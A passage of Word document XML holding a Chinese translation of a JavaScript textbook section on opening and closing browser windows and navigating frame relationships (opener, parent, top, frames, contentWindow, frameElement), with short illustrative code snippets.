      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。可以在自己的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中使用这个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象来引用新创建的窗口，就像使用隐式的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>来引用运行代码的窗口一样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var w=window.open();//</w:t>
      </w:r>
      <w:r>
        <w:t>打开一个新的空白窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w.alert("Abou</w:t>
      </w:r>
      <w:r>
        <w:t>t to visit http://example.com");//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w.location="http://example.com";//</w:t>
      </w:r>
      <w:r>
        <w:t>设置它的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在由</w:t>
      </w:r>
      <w:r>
        <w:t>window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建的窗口中，</w:t>
      </w:r>
      <w:r>
        <w:t>opener</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是打开它的脚本的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在其他窗口中，</w:t>
      </w:r>
      <w:r>
        <w:t>opener</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w.opener!==null;//true</w:t>
      </w:r>
      <w:r>
        <w:t>，对于由</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>创建的任意窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w.open().opener===w;//true</w:t>
      </w:r>
      <w:r>
        <w:t>，对于任意窗口</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Window.open()</w:t>
      </w:r>
      <w:r>
        <w:t>是广告</w:t>
      </w:r>
      <w:r>
        <w:t>商用来在你浏览网页时采用的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>页面之前弹出</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>页面之后弹出</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>窗口的一种方法。由于对于这种烦人的弹出窗口的滥用，因此大部分浏览器都增加了弹出窗口过滤系统。通常，</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只有当用户手动单击按钮或者链接的时候才会调用。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码尝试在浏览器初始载入（或卸载）时开启一个弹出窗口时，通常会失败。将上面的代码粘贴到浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>控制台里进行测试，可能会由于同样的原因而失败。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关闭窗口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>就像方法</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>打开一个新窗口一样，方法</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>将关闭一个窗口。如果已经创建了</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>，可以使用如下的代码将它关掉：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运行在那个窗口中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码则可以使用下面的代码关闭：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注意，要显式地使用标识符</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>，这样可以避免混淆</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>如果正在从事件处理程序调用</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>，这很重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数浏览器只允许自动关闭由自己的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建的窗口。如果要关闭其他窗口，可以用一个对话框提示用户，要求他对关闭窗口的请求进行确认（或取消）。在表示窗体而不是顶级窗口或标签页上的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上执行</w:t>
      </w:r>
      <w:r>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不会有任何效果，它不能关闭一个窗体（反之可以从它包含的文档中删除</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>即使一个窗口关闭了，代表它的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象仍然存在。已关闭的窗口会有个值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>closed</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它的</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>会是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，它的方法通常也不会再工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="14_8_2_Chuang_Ti_Zhi_Jian_De_Guan_Xi_"/>
      <w:r>
        <w:t>14.8.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　窗体之间的关系</w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经知道，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法</w:t>
      </w:r>
      <w:r>
        <w:t>open()</w:t>
      </w:r>
      <w:r>
        <w:t>返回代表新创建的窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。而且这个新窗口具有</w:t>
      </w:r>
      <w:r>
        <w:t>opener</w:t>
      </w:r>
      <w:r>
        <w:t>属性，该属性可以打开它的原始窗口。这样，两个窗口就可以相互引用，彼此都可以读取对方的属性或是调用对方的方法。窗体也是这样的。窗口或窗体中运行的代码都可以通过下面介绍的属性引用到自己的窗口或窗体，以及嵌套的子窗体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>任何窗口或窗体中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码都可以将自己的窗口和窗体引用为</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>。窗体可以用</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用包含它的窗口或窗体的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parent.history.back();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果一个窗口是顶级窗口或标签，而不是窗体，那么其</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的就是这个窗口本身：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parent==self;//</w:t>
      </w:r>
      <w:r>
        <w:t>只有顶级窗口才会返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果一个窗体包含在另一个窗体中，而后者又包含在顶级窗口中，那么该窗体就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>parent.parent</w:t>
      </w:r>
      <w:r>
        <w:t>来引用顶级窗口。</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个通用的快捷方式，无论一个窗体被嵌套了几层，它的</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的都是指向包含它的顶级窗口。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象代表的是一个顶级窗口，那么它的</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的就是窗口本身。对</w:t>
      </w:r>
      <w:r>
        <w:t>于那些顶级窗口的直接子窗体，</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性就等价于</w:t>
      </w:r>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parent</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性允许脚本引用它的窗体的祖先。有不止一种方法可以引用窗口或窗体的子孙窗体。窗体是通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素创建的。可以用获取其他元素的方法来获取一个表示＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>元素对象。假定文档里有＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe id="f1"</w:t>
      </w:r>
      <w:r>
        <w:t>＞。那么，表示该</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>的元素对象就是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var iframeElement=document.getElementById("f1");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素有</w:t>
      </w:r>
      <w:r>
        <w:t>contentWindow</w:t>
      </w:r>
      <w:r>
        <w:t>属性，引</w:t>
      </w:r>
      <w:r>
        <w:t>用该窗体的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，所以此窗体的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象就是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var childFrame=document.getElementById("f1").contentWindow;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以进行反向操作</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>从表示窗体的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象来获取该窗体的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性。表示顶级窗口的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，窗体中的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>frameElement</w:t>
      </w:r>
      <w:r>
        <w:t>属性不是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>elt=document.getElementById("f1");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var win=elt.contentWindow;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>win.frameElement===elt//</w:t>
      </w:r>
      <w:r>
        <w:t>对于帧来说永远是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.frameElement===null//</w:t>
      </w:r>
      <w:r>
        <w:t>对于顶级窗口来说永远是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管如此，通常不需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>contentWindow</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获取窗口中子窗体的引用。每个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有一个</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>rames</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它引用自身包含的窗口或窗体的子窗体。</w:t>
      </w:r>
      <w:r>
        <w:t>frames</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的是</w:t>
      </w:r>
      <w:r>
        <w:t>类数组对象，并可以通过数字或窗体名进行索引。要引用窗口的第一个子窗体，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>frames[0]</w:t>
      </w:r>
      <w:r>
        <w:t>。要引用第二个子窗体的第三个子窗体，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>frames[1].frames[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。窗体里运行的代码可以用</w:t>
      </w:r>
      <w:r>
        <w:t>parent.frames[1]</w:t>
      </w:r>
      <w:r>
        <w:t>引用兄弟窗体。注意</w:t>
      </w:r>
      <w:r>
        <w:t>frames[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组里的元素是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不是＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性，那么除了用数字进行索引之外，还可以用名字来进行索引。例如，名字为</w:t>
      </w:r>
      <w:r>
        <w:t>"f1"</w:t>
      </w:r>
      <w:r>
        <w:t>的帧应该用</w:t>
      </w:r>
      <w:r>
        <w:t>frames["f1"]</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>frames.f1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>刚刚在</w:t>
      </w:r>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节中讲到，＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞以及其他元素的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>都可以自动通过</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性来应用，而＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和其他的元素有所不同：对于窗体来说，通过</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性引用的＜</w:t>
      </w:r>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t>＞是指窗体中的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不是元素对象。也就是说，可以通过窗体的名字</w:t>
      </w:r>
      <w:r>
        <w:t>"f1"</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>frames.f1</w:t>
      </w:r>
      <w:r>
        <w:t>。实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范指出</w:t>
      </w:r>
      <w:r>
        <w:t>frames</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个自引用（</w:t>
      </w:r>
      <w:r>
        <w:t>self-referential</w:t>
      </w:r>
      <w:r>
        <w:t>）的属性，就像</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>一样。而这个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象看起来像一个由窗体组成的数组。也就是说可</w:t>
      </w:r>
      <w:r>
        <w:t>以通过</w:t>
      </w:r>
      <w:r>
        <w:t>windo w[0]</w:t>
      </w:r>
      <w:r>
        <w:t>来获取第一个子窗体的引用，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>window.length</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
